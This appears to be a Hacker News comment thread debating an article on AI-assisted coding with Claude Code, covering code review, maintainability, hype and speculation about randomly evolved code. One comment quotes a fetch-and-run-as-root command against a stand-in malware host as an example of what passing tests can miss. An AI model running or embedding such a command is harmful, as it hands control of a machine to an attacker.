Maybe for a personal project but this doesn't work in a multi-dev environment with paying customers. In my experience, paying attention to architecture and the code itself results in a much more pliable application that can be evolved.
I'll caveat my statement, with AI ready repos. Meaning those with good documentation, good comments (ex. avoiding Chestertons fence), comprehensive interface tests, Sentry, CI/CD, etc.
Established repos are harder because a) the marginal cost of something going wrong is much higher b) there's more dependencies c) this makes it harder to 'comprehensively' ensure the AI didn't mess anything up
I say this in the article
> There's no "right answer." The only way to create your best system is to create it yourself by being in the loop. Best is biased by taste and experience. Experiment, iterate, and discover what works for you.
Try pushing the boundary. It's like figuring out the minimum amount of sleep you need. You undersleep and oversleep a couple times, but you end up with a good idea.
To be clear, I'm not advocating for canonical 'vibe coding'. Just that what it means to be a good engineer has changed again. 1) Being able to quickly create a mental map of code at the speed of changes, 2) debugging and refactoring 3) prompting, 4) and ensuring everything works (verifiability) are now the most valuable skills.
We should also focus more on the derivative than our point in time.
And not even by much, 1/2/4 have always been signs of good engineers.
I get the feeling you're intentionally being a parody with that line.
> and ensuring everything works (verifiability) are now the most valuable skills.
Something might look like it works, and pass all the tests, but it could still be running `wget https://malware.sh | sudo bash`. Without knowing that it's there how will your tests catch it?
My example is exaggerated and in the real world it will be more subtle and less nefarious, but just as dangerous. This has already happened, OpenCode is a recent such example. It was on the front page a few days ago, you should check it out. Of course you have to review the code. Who are you trying to fool?
> We should also focus more on the derivative than our point in time.
So why are you selling it as possible in "our point in time" (are you getting paid per buzzword?). I read the quote as "Yes, I'm full of shit, but consider the possibilities and stop being a buzzkill bro".
Extremely depressing to see this happening to the craft I used to love.
the OP is a kid in his 20s describing the history of the last 3 years or so of small scale AI Development (https://www.linkedin.com/in/silen-naihin/details/experience/)
How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc.
When will AI be ready? Microsoft tried to push AI into big enterprise, Anthropic is doing a better job -but its all still in infancy
Personally for me I hope it won't be ready for another 10 years so I can retire before it takes over :)
I remember when folks on HN all called this AI stuff made up
I do think you're missing how this will likely go down in practice, though. Those giant codebases with years of domain rules are all legacy now. The question is how quickly a new AI codebase could catch up to that code base and overtake it, with all the AI-compatibility best practices baked in. Once that happens, there is no value in that legacy code.
Any prognostication is a fool's errand, but I wouldn't go long on those giant codebases.
“prediction is hard especially about the future” - yogi berra
As a hedge - I have personally dived deep into AI coding, actually have been for 3 years now - I’ve even launched 2 AI startups and working on a third - but its all so unpredictable and hardly lucrative yet
As an over 50 year old - I’m a clear target for replacement by AI
No mention of the results when targeting bigger, more complex projects, that require maintainability, sound architectural decisions, etc… which is actually the bread and butter of SW engineering and where the big bucks get made.
Caught you! You have been on HN very actively the last days, because these were exactly the projects in "Show HN: .." category and you would not be able to tell them if you wouldnt have spent your whole time here :-D
Ha! :-D
A substantial number of the breathless LLM hype results come, in my estimation, quicker and better as 15 min RoR tutorials. [Fire up a calculator (from a library), a pretty visualization (from a js library), add some persistence (baked in DB, webhost), customize navigation … presto! You actually built a personal application.]
Fundamental complexity, engineering, scaling gotchyas, accessibility needs, customer insanity aren’t addressed. RoR optimizes for some things, like any other optimization that’s not always a meaningful.
LLMs have undeniable utility, natural interaction is amazing, and hunting in Reddit, stackoverflow, and MSDN forums ‘manually’ isn’t a virtue… But when the VC subsidies stop and the psychoses get proper names and the right kind of egg hits the right kind of face over unreviewed code, who knows, maybe we can make a fun hype cycle called “Actual Engineering” (AE®).
Agreed, but: being able to read and apply the 1st-party documentation is a virtue
Project was started in late 00s so it has substantial amount of business logic, rules and decisions. Maybe I'm being an old man shouting at the clouds, but I assume (or hope?) it would fail to deliver whatever they promised to the CEO.
So, I guess I'll see the result of this shift soon enough - hopefully at a different company by the time AI-people are done.
Maybe the deed is done here, and I'd agree it's not particularly fun, but you could still think about what you can bring to the table in situations like this. Can you work on shortening these pesky feedback cycles? Can you help the team (if they even accept it) with _some_ degree of engineering? It might not be the last time this happens.
I think right now we're seeing some weird stuff going on, but I think it hasn't even properly started yet. Remember when pretty much every company went "agile"? In most cases I've seen they didn't, just wasting time chasing miracles with principles and methodologies few people understand deeply enough to apply. Yet this went on for, what, 10 years?
At most of the companies I've worked at the development team is more like a cluster of individuals who all happen to be contributing to a shared codebase than anything resembling an actual team who collaborate on a shared goal. AI-assisted engineering would have helped massively because the AI would be looking outside of the myopic view any developer who is only focused on their tiny domain in the bigger whole cared about.
Admittedly though, on a genuinely good team it'll be less useful for a long time.
I have access to Claude Code at work. I integrated it with IntelliJ and let it rip on a legacy codebase that uses two different programming languages plus one of the smaller SCADA platforms plus hardware logic in a proprietary format used by a vendor tool. It was mostly right, probably 80-90%, had a couple mis-understandings. No documentation, I didn't really give it much help, it just kind of...figured it out.
It will be very helpful for refactoring the codebase in the direction we were planning on going, both from the design and maybe implementation perspectives. It's not going to replace anybody, because the product requires having a deep understanding across many disciplines and other external products, and we need technical people to work outside the team with the larger org.
My thinking changes every week. I think it's a mistake to blindly trust the output of the tool. I think it's a mistake to not at least try incorporating it ASAP, just to try it out and take advantage of the tools that everybody else will be adopting or has adopted.
I'm more curious about the impacts on the web: where is the content going to come from? We've seen the downward StackOverflow trend, will people still ask/answer questions there? If not, how will the LLMs learn? I think the adoption of LLMs will eventually drive the adoption of digital IDs. It will just take time.
I know this because I am at one now making an ungodly amount of money with 50k active users a day on a complete mudball monothilic node + react + postgres app used by multiple Fortune 100 companies.
High velocity teams also observe production system telemetry and use error rates, tracing and more to maintain high SLAs for customers.
They set a "budget" and use feature flagging to release risky code and roll back or roll forward based on metrics.
So agentic coding can feed back on observed behaviors in production too.
But we have to use this "innovation budget" in a careful way.
If AI-hype was a person
related meme i saw today:
“bro I spent all weekend in Claude Code it’s incredible”
“oh nice, what did you build?”
“dude my setup is crazy. i’ve got all the vercel skills, plus custom hooks for every project”
“sick, what are you building?”
“my setup is so optimized, i’m using like 5 instances at once”
Then I saw a few other people reference it and it's as good a term as any to describe the hot air of people telling us how amazing ai coding is without giving the code, the prompts, or the price of what they did.
Just like how that one kid in highschool had a Canadian girlfriend.
Did we just stop caring about the art of programming altogether?
So, get a bug tracker, track those bugs, tell Claude to pick tasks off it etc.
I'm not claiming this actually works, I've not tried it, I don't know how good it is for large brownfield projects, but that's the general sentiment I see.
Elsewhere there are steps for how to develop: 1. Create new branch for the feature you are working on; 2. implement the feature fully, thinking hard when you need to (toolcall think(low, med, high) switches the reasoning level);
That said, it also failed a lot.
> Did we just stop caring about the art of programming altogether?
Yes. Decades ago for some.
I'm sure there have been a number of significant bugs caused by someone taking work from an outsourced team into production without sufficient review. Or even work from a local junior. Heck, even a local senior!¹
Outsourcing work to GlorifiedPredictiveText and friends should be treated the same was as passing it on to other humans, but at the moment it too often isn't as many have fallen for the marketing. Always remember: the models were trained on public code, and public code is far from always right. And the models hallucinate³ on top of that.
--------
[1] Around this time last year, I was that senior… Fun times. Luckily no permanent damage done², but that'll teach people not to trust me too much!
[2] It wasn't as smooth as I would have hoped, but the roll-back plan worked.
[3] Going back to the analogy of outsourcing to other humans: this is akin to “making shit up as they go along and hoping for the best”, which also very much happens and has happened for decades.
> a) never plan on learning and just care about outputs, or
> b) are an abstraction maximilist.
As a Claude Code user for about 6 months, I don't identify with either of these categories. Personally I switched to Claude Code because I don't particularly enjoy VScode (or forks thereof). I got used to a two window workflow - Claude Code for AI-driven development, and Goland for making manual edits to the codebase. As of a few months ago, Claude Code can show diffs in Goland, making my workflow even smoother.
Always curious to hear how individuals have their workflows, if you don’t mind sharing.
Sure, the information is all there, but the style just puts me off reading it. I really don't like how few authors have a voice any more, even if that voice is full of typos and grammatical errors.
I used Claude to expand on my ideas for a few of the purely informational things, and for formatting, but this article is largely written by hand.
For example "Interface tests are the ability to know what's wrong and explaining it." is in hindsight a confusing sentence. Many such cases.
> Enter Claude Code 2.0.
> The UX had evolved. The harness is more flexible and robust. Bugs are fixed. But that's all secondary.
It's OK for emphasis on some things, but when you see it on every blog, it's a bit much.
Plus, I dislike that everything is lists with LLMs, it's another thing that you just start seeing everywhere.
Either a) I sound like an LLM when I'm writing articles (possible) or b) turing test AGI something something.
Lists point is fair, I did use Claude for formatting. Where did it off put you here?
I guess I don't really mind the use of an LLM or not, it's more the style that sounds very samey with everything else. Whether it's an LLM or not is not very relevant, I guess.
We entered the machinable culture. We spent many years trying to make the machine mimic humans, now humans are mimicking the machine :)
Claude Code was transformative and it made me realize that something very incredibly significant had occurred. Letting the LLM "drive" like this was inevitable. Now I see just exactly how this will transform our industry. I'm a little scared about how it will end for me/us, but excited for now.
Letting an LLM drive in an agentic flow removes you from the equation. Maybe that's what some want - but I've personally found I end up with something that doesn't feel like I wrote it.
Now... get off my lawn!
I catch a lot of nonsensical and inefficient code when I have that "back and forth" described above - particularly when it comes to architectural decisions. An agent producing hundreds or thousands of lines of code, and making architectural decisions all in one-go will mean catching those problems will be vastly more challenging or impossible.
I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code. It's just a mental/brain drain. I've wasted so many hours wondering if I'm just dumb and missing something or not-understanding some code - only to later realize the LLM was on the fritz. Having little or no previous context to understand the code creates a "standing at the foot of Mt. Everest" feeling constantly, over and over.
absolute opposite here.
LLMs , for better or worse, generally stick to paradigms if they have the codebase in front of them to read.
This is rarely the case when dealing with an amateur's code.
Amateurs write functional-ish code. TDD-ish tests. If the language they're using supports it types will be spotty or inconsistent. Variable naming schemes will change with the current trend when the author wrote that snippet ; and whatever format they want to use that day will use randomized vocabulary with lots of non-speak like 'value', or 'entry' in ambiguous roles.
LLMs write gibberish all day, BUT will generally abide by style documents fairly well. Humams... don't.
These things evolve as the codebase matures, obviously, but that's because it was polished into something good. LLMs can't reason well and their logic sometimes sucks, but if the AGENTS.md says that all variables shall be cat breeds -- damnit that's what it'll do (to a fault).
but my point : real logic and reasoning problems become easier to spot when you're not correcting stupid things all day. it's essentially always about knowing how to use the model and whatever platform it's jumping from. Don't give it the keys to create the logical foundation of the code, use it to polish brass.
garbage in -> garbage out ain't going anywhere.
On a more serious note, I do think that the maintenance aspect is a differentiator, and that if it’s something that you end up committing to your codebase then ownership and accountability falls to you. Externally sourced libraries and frameworks ultimately have different owners.
In particular, the PR author's response to this question:
> Here's my question: why did the files that you submitted name Mark Shinwell as the author?
> > Beats me. AI decided to do so and I didn't question it.
The same author submitted a similar PR to Julia as well. Both were closed in-part due to the significant maintenance burden these entirely LLM-written PR's would create.
> This humongous amount of code is hard to review, and very lightly tested. (You are only testing that basic functionality works.) Inevitably the code will be full of problems, and we (the maintainers of the compiler) will have to pay the cost of fixing them. But maintaining large pieces of plausible-in-general-but-weird-in-the-details code is a large burden.
Setting aside the significant volume of code being committed at once (13K+ lines in the OCaml example), the maintainers would have to review code even the PR author didn't review - and would likely fall into the same trap many of us have found ourselves in while reviewing LLM-generated code... "Am I an idiot or is this code broken? I must be missing something obvious..." (followed by wasted time and effort).
The PR author even admitted they know little about compilers - making them unqualified to review the LLM-generated code.
I think LLMs are much more effective when you have a good understanding of a field and can work in the above way; their assistance is useful because I don't have time or brainpower to be an _expert_ in many of the fields I'm _knowledgable_ in.
I have a BIRTHING_POOL.md that combines the best AGENTS.md and introduces random AI-generated mutations and deletions. The candidates are tested using take-home PRs which are reviewed by HR.md and TECH_MANAGER.md. TECH_MANAGER.md measures completion rate per tokens (effectiveness) and then sends the stack ranking of AGENT.mds to HR to manage the talent pool. If agent effectiveness drops low enough, we pull from the birthing pool and interview more candidates.
The end result is that it effectively manages a wider range of agent talents and you don't get into these agent hive mind spirals you get if every worker has the same system prompt.
I think this is where things will ultimately head. You generate random code, purely random in raw machine readable binary, and simply evaluate a behavior. Most random generated code will not work. some, however, will work. and within that working code, some will be far faster and this is the code that is used.
No different than what a geneticist might do evaluating generated mutants for favorable traits. Knowledge of the exact genes or pathways involved is not even required, one can still select among desired traits and therefore select for that best fit mechanism without even knowing it exists.
And how is this different than the process of natural selection? More fit ideas win out relative to less fit and are iterated upon.
Second, there are other algorithms that constructively find a solution and don't work at all like genetic algorithms, such as mathematical solvers.
Third, sometimes, a design is also simply thought up by a human, based on their own professional skills and past experience.
Natural selectiom:
- is not an intentional process
- does not find "the strongest the fittest the fastest etc."
However your starting definition was more limited. it was specifically about "creating candidates at random, then just picking the one that performs best" - and that's definitely not how airplanes are designed.
(It's not even how LLMs work, in fact)
I remember when people said Open Office was going to be the default because it was open source, etc etc etc. It never happened. Got forked. Still irrelevant.
I think we need to think outside the box here and realize ideas can be generated, evaluated, and settled upon far faster than any human operates. The idea of doing what a trillion humans evaluating different functions can do is actually realistic with the path of our present technology. We are at the cusp of some very remarkable times, even more remarkable than the innovations of the past 200 years, should we make progress on this effort.
A trillion is 8 symbols. You still haven't reached the end of your first import statement.
I just took a random source file on my computer. It has about 8000 characters. The number of possible files with 8000 characters has 12500 digits.
At this point, restricting the search space to syntactically valid programs (how do you even randomly generate that?) won't make a difference.
By using a grammar. Here is an example on how to only generate valid JSON with llama.cpp: https://github.com/ggml-org/llama.cpp/blob/master/grammars/R...
> A trillion is 8 symbols. You still haven't reached the end of your first import statement.
Since LLMs use tokens from a vocabulary instead of characters, the number is likely somewhere in the lower billions for the first import statement.
But of course, LLMs do not sample from a uniform random distribution, so there are even fewer likely possibilities.
But I hope we have more efficient ways to do this in a century.
This doesn't work when the software in question is written by competent humans, let alone the sort of random process you describe. A run of the software only tells you the behavior of the software for a given input, it doesn't tell you all possible behaviors of the software. "I ran the code and the output looked good" is no where near sufficient.
> We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development.
There is a vast chasm between "bioinspiration is sometimes a good technique" and "genetic algorithms are a viable replacement for writing code".
And with future compute, you will be able to evaluate behavior across an entire range of inputs for countless putative functions. There will be a time when none of this is compute bound. It is today, but in three centuries or more?
Evolution ain't all that great.
Yes, and our species is a fragile barely functioning machinery with an insane number of failing points, and hillariously bad and inefficiently placed components.
In this situation, AI companies are incentivised to host the services their tooling generates. If we don't get source code, it is much easier for them to justify not sharing it. Plus, who is to say the machine code even works on consumer hardware anyway? It leads to a future where users specify inputs while companies generate programs and handle execution. Everything becomes a black box. No thank you.
Tell me you know nothing about modern agriculture without telling me that
Humans are expensive but this approach seems incredibly inefficient and expensive. Even a junior can make steady progress against implementing a function, with your approach, just monkey coding like that could take you ages to write a single function. Estimates in software are already bad, they will get worse with your approach
But that's future music, forgive a young man for letting his imagination run wild! ;)
One big advantage of this future random walk paradigm is you would not be bound by the real world constraints of sample collection of biological data. datasets could be made arbitrarily large and cost to do so will follow an inverse relationship with compute gains.
Code derived from a training set is not at all "random."
This has been tried. It tends to overfit to unseen test environment conditions. You will not produce what you intend to produce.
> the massive compute capability we will have
Just burn carbon in the hopes something magical will happen. This is the mentality of a cargo cult.
Today you send some money to your spouse but it's received by another person with the same name. Tomorrow you order food but your order gets mixed up with someone else's.
Tough luck, the system is probabilistic and you can only hope that the evolutionary pressures influence the behavior to change in desirable ways. This fantasy is a delusion.
Whatever gets generated, if it passes tests and is observably in compliance with the spec, is accepted and made permanent. It's the clay we're talking about Jackson Pollocking, not the sculpture.
> observably in compliance with the spec
That's so easy to say and so incredibly hard to implement! Most unintended behaviors will never end up being prohibited/defined in the specification written by non-programmers.
The act of translating requirements from human language into well-defined semantics is what programming is.
Yes a function will always do "the exact same thing" at runtime, but that "thing" isn't guaranteed to be free from race conditions and other types of bugs.
Customers.
When you sell them a technological solution to their problem, they expect it to work. When it doesn't, someone needs to be responsible for it.
Now, maybe I'm wrong, but I don't see any of the current AI leaders being like, "Yeah, you're right, this solution didn't meet your customer's needs, and we'll eat the resulting costs." They didn't get to be "thought leaders" in the current iteration of Silicon Valley by taking responsibility for things that got broken, not at all.
So that means you will need to take responsibility for it, and how can you make that work as a business model? Well, you pay someone - a human - who knows what they're looking at to review at least some of the code that the AI generates.
Will some of that be AI-aided? Of course. Can you make a lot of the guesswork go away by saying "use commonly-accepted design patterns" in your CLAUDE.md? Sure. But you'll still need someone to enforce it and take responsibility at the end of the day if it screws up.
You also no longer need to work, earn money, have a life, read, study, know anything about the world. This is pure fantasy my brain farts hard when I read sentences like that
This will be reality in 10-20 years
I'm really trying to understand this. From a learner point of view this is useless because you aren't learning anything. From an entrepreneur point of view it's useless too, I suppose? I wouldn't ship something I'm not 100% sure about how it works.
I thought the difference must be in how Claude Code does the agentic stuff - reasoning with itself, looping until it finds an answer, etc. - but I have spent a fair amount of time with Claude Code now and found that agentic experience to be about the same between Cascade and Claude Code.
What am i missing? (serious question, i do have Claude Code FOMO like the OP)
What AI have you been using for 5 years of coding?
side note, I’ve been trying to remember when it launched internally if anybody knows. I feel like it was pre-COVID, but that’s a long timeline from internal use to public preview
That being said, after seeing inside a couple YC backed SaaS companies I believe you can get by without reading the code. There are bugs _everywhere_, yet one of these companies made it years and sold. Currently going through the onerous process of fixing this as new company has a lot of interest in reducing the defect count. It is painful, difficult, and feeling like the company bought a lemon.
I think the reality is there’s a lot of money to be made with buggy software. But, there’s still plenty of money in making reliable software as well (I think?).
My heaviest token use thus far was on my first attempt to vibecode a project. It was a lot of code but complete trash
Have OpenAI Codex do code reviews, it’s the best one so far at code reviews. Yes, it’s ironic (or not) that the code writer is not the best reviewer.
It is wild that people are ao confident with AI that they're not testing the code at all?
What are we doing as a programmer? Reducing the typing + testing time? Because we have to write the prompt in English and do software design otherwise AI systems write a billion lines of code just to add two numbers.
This hype machine should show tangible outputs, and before anyone says they're entitled to not share their hidden talents then they should stop publishing articles as well.
You can't have your cake and have it too!
It's only for a fraction of the price, but 3 times as much limits.
I currently use github subscription for hobby projects.
But I will probably check out claudecode next month when my github copilot subscription runs out.
Edit: I found this: https://www.reddit.com/r/ClaudeCode/comments/1q6f62t/tried_n... Seems like it might be worth to check it out. Found a 10% discount that works on the additional discount so now it would be 26 USD / year.
Code review is the only thing that has kept this house of cards from falling over. So undermining its importance makes me question the hype around LLM tooling even more. I’ve been using these tools since their inception as well, but with AI tooling, we need to hold on to the best practices we’ve built over the last 50 years even more, instead of trying to reinvent the wheel in the name of “rethinking.”
Code generation is cheap, and reviews are getting more and more expensive. If you don’t know what you generated, and your team doesn’t know either because they just rubber-stamped the code since you used AI review, then no one has a proper mental model of what the code actually does.
So when things come crashing down in production, debugging and investigation will be a nightmare. We’re already seeing scenarios where on-call has no idea what’s going on with a system, so they page the SME—and apparently the SME is AI, and the person who did the work also has no idea what’s going on.
Until omniscient AI can do the debugging as well, we need to focus on how we keep practicing the things we’ve organically developed over such a long time, instead of discarding them.
I needed a poc RAG pipeline to demo concepts to other teams. Built and tested this over the weekend, exclusively with Claude Code and a little OpenCode. Mix of mobile app and breaking out Android terminal to allow Sonnet 4.5 to run the dotnet build chain on tricky compilation issues.
Why would that be any harder than a React app? At least for me having an LMM produce a decent and consistent UI layout is not that straightforward
LLM denialists were always wrong and they should be embarrassed to share their bad model of reality and how the world works.
Please stop inundating us with bad code. At least make sure your diffs compile before attaching them to the PR.
I guess I'll finally try Claude Code, need to get a burner SIM first though… I cannot for the life of me understand why I can just sign up for the API yet must give a mobile phone number for the product.
> 1. my experience from 5 years of coding with AI
It is a testament to the power of this technology that the author has managed to fit five years of coding with AI in between 2023 and now
5 years? You were coding with AI in January 2021 - mid pandemic?
Can we please not fill Hacker News with this obvious rubbish?